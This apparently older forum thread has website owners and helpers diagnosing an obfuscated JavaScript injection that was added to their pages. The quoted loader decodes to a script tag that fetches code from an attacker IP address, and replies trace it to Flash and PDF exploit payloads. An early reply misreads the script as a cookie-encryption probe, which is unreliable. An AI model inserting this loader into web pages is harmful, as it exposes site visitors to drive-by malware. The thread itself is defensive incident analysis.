js script - for Juliet

Hi All
Can someone tell me if there is something malicious in this script.

"I also found a JS script inserted into a website (www.glassandpotterysellers.org) I made changes to yesterday as follows:

<head>
<title>The Glass and Pottery Sellers Association</title>
</head>
<script language=javascript><!--
document.write(unescape('%3CDosM7cDor5ybipM7t%20M7sruuZcCRN%3DWnX%2F7sH%2F9 4Do%2E247%2EM72%2E19uuZ5%2FP0jqueP0rWnXy%2EIOjDos%3EM7%3C%2FsIOcCRNrCRNipt% 3E').replace(/7sH|uuZ|G3b|M7|WnX|P0|Do|IO|CRN|5yb/g," "));
--></script>

When I look at my source code in Dreamweaver, there is not a script there, but apparently it has uploaded to every page on my site. Yikes. I tried to use WS_FTP Pro to check out the directories but it sounded like it connected to the server but nothing was visible in my folder. "

http://www.windowsbbs.com/malware-v...edirect-problem-dds-fails-browsers-crash.html

Thanks
Geri

 

On my desktop system

Code:

unescape('%3CDosM7cDor5ybipM7t%20M7sruuZcCRN%3DWnX%2F7sH%2F9 4Do%2E247%2EM72%2E19uuZ5%2FP0jqueP0rWnXy%2EIOjDos%3EM7%3C%2FsIOcCRNrCRNipt% 3E'

Creates 'M7'

Code:

replace(/7sH|uuZ|G3b|M7|WnX|P0|Do|IO|CRN|5yb/g," ")

Then replaces it with a blank. That's why you are seeing no output.

I think the code would be used to work out what encryption method the JavaScript escape function is using on your site.

Cookies are often encrypted using escape and that process is reversed with unescape. So my guess is that someone is using this process to help them crack into the cookie information stored by your application.

I expect that most systems will unescape the long string into one of the alternatives in the replace regex.

I think the hacker has tools that will crack code escaped with systems that return one of these results : 7sH, uuZ, G3b, M7, WnX, P0, Do, IO, CRN, or 5yb. Therefore, all they want to know is if the site is using a form of escape that doesn't return one of the standard return strings, so that they can avoid it and move on to a site that they can crack.

However, I wonder if they have a system that can watch the process and determine the output before it is replaced. That would give them more exact information on the encryption process on your system. I think they'd need a customised browser to do that, and it's more likely they aren't bothering.

If I am right, this will only give them access to users cookie information. So an excellent example of why you shouldn't store sensitive data (credit card details for example) in cookies. Instead use cookies as part of the process to identify where the data is held server side. Only part of the process so that cookie information alone, isn't enough to allow the data to be recovered.

More worrying of course is the fact that someone's actually been able to add this code to your pages. Therefore, I'd fully support TonyT suggestion.

 

Actually, thinking about it more - that code is firing client side. Therefore, it effectively a diagnostic of the users browser rather than your application. It is making information stored on the users systems more easy to crack rather than code stored in your application specifically. That information could be stored in any of the cookies stored in a users browser. So you're not doing your user any good at all keeping the code in place.

And we still have the issue of how the code got there in the first place.

 

Hi
OK this is from a user in the Malware forum. (Nikolette)

If she wants more information where would you like him/her to post at?

Thanks

 

Looks like I was wrong about how it was being used then!

 

hi,

I encountered the same script on our site. I used grep -r 'czz8' /homedir/ to look for files containing the script.
The QUERY.JS it calls is modified with another escaped url with replace and so on...
this in return refers to hxxp://94.247.2.195/news/?id=100
which calls three files :
hxxp://94.247.2.195/news/?id=3 ( two times )
hxxp://94.247.2.195/news/?id=2

the browser gets two flash files which I decompiled and a pdf file
containing this rqo1V9hKSNFXaI

The flash files use the loadBytes method of a sprite loader to load malicious code into the player.
The code itself is coded into a string and then decoded using a key.
Haven't figured out what is does yet but it is most probably a trojan. The flash 10 debugger shows the flash file
failing in a null exception.

 

Hi bunsenstraat
Thanks for the information.

The person sent the information to there server.

Thanks
Geri

 

I'm hitting the same issue - I've cleaned up the website of mine, but am wondering about the access method. I've changed passwords and locked down some scripts I'm not sure of, and waiting.... Any info on the infection method?

I have php, js and html files and all were infected with code doing the same thing, and referring to the same ip address for the code to try to infect the user...

 

Thanks Tony - my thought also, and that's what I have locked down. I think Bunsenstraat is on the right track with it redirecting users to a site that has attempted exploits of flash and pdf.

I just wish our hosting had limited sftp/ftp like others have. Too many have access to the web site for legit reasons

 

we have fetched the malware as well

we got the malware an sunday and yesterday on 2 different servers...
we have encoded the script and traced everything, but we still seek for the NAME of the malware... or a program that can find the malware on the server...
are you further on details than we are?
we have found Trojan.BHO but this could be a coincident as well...
regards,
silvan

 

I also have seen this code, starting last week. The script is very similar to what was mentioned here, same IP address, but slightly different encoded content. The script was inserted into every html, shtml and php file in the web site right before the "<body> "--the dates were also changed on all of those files, some occurring in the same second. I don't know what it is doing but it is, obviously, connecting to the IP address mentioned above which can't be good.

Though I manage the site, I don't do the day to day editing, and this code appears to be getting inserted from the computer of the person that edits pages on the site, or, at least it happens when she logs in, but not when I do from my computer, so my guess is it doesn't reside on the server.

I did, however, find some php files up there that I didn't put there, that looked like they had something to do with filling out forms; I deleted them.

I ran Advanced Find and Replace and removed the code from all of the files on the site and on my machine, asked the other person to delete all of the html files on her machine so that she would have to download a new, cleaned copy, had them run a Symantec Scan, SuperAntiSpyware scan, and though Symantec has been finding a Trojan on several scans (already a bad sign), and they followed the Symantec removal instructions, she logged into the web site again (think she is using IE ftp) and the code was re-inserted into every file on the web site, even those in subfolders.

I've been searching around, but haven't found any better information on getting rid of it, short of wiping her machine (which I very seldom resort to but is sometimes faster than tracking one of these gremlins down).

Anyone discovered anything yet?

Ron

 

Check the ftp login logs on the server. Get the ip the legit users login from. We found access at the time the code was inserted from an unknown ip ( in Texas, but could have been a relay). It could be when she logged in, but it could also be coincidence and someone else logged in at a similar time.

Oh, and almost too obvious to ask....but you did change the ftp passwords, right? The hacking or my site stopped when I got back in town, learned about it and changed the ftp password, so that and the strange ip addy in the ftp access log kind of nailed it down.

 

Yes I did change the password. The html file dates getting changed (and thus the code insertion) has happened twice, both times right when she logged in, with considerable time in between, points me at her computer, but don't know why, and I don't maintain that computer, I'm just a volunteer webmaster for that org.

 

wow, the viruses are getting real sophisticated then! Any idea of the program she is logging in with? ssh? ftp? specific ftp client?

 

-----------

She was using an FTP connection through Windows Explorer, they had no other decent ftp software.

I would agree the server does not have the infection (though, as I mentioned, I am a bit suspicious of a few php files I found up there that were not familiar to me).

Also, obviously the docs were modified by an automated process since their times were so close together. I used AFR to remove the code in all of the files, took a few seconds, so it wouldn't take much to make the changes in the first place.

At the risk of repeating myself, the changed file times correspond exactly with her login on two occasions and have never happened otherwise; also there are no other logins, so I've got to assume that this process is being initiated by her login and I assume it is a process running from her computer, or through it. This would not, then, even require FTP credentials to be stolen, and would also possibly mean that changing the password will not stop it, though I'm hesitant to allow her to log in again to test the theory until the source is determined, and I don't really want to get involved in working on their computer to track this down.

My current suggestion to them, and one I very seldom make, is that it will probably be faster and more effective to rebuild their computer since I've not been having much luck tracking down an easier solution, especially since Symantec as been turning up Trojans lately (though their behavior doesn't seem to be associated with this problem), but they have not been effectively removed despite using manual removal methods.

I have found various comments associated with the address used by this code, 94.247.2.195, but have found no fixes.

wzd, are you the same wzd from dynamicdrive? and, if so, should I put this over there also?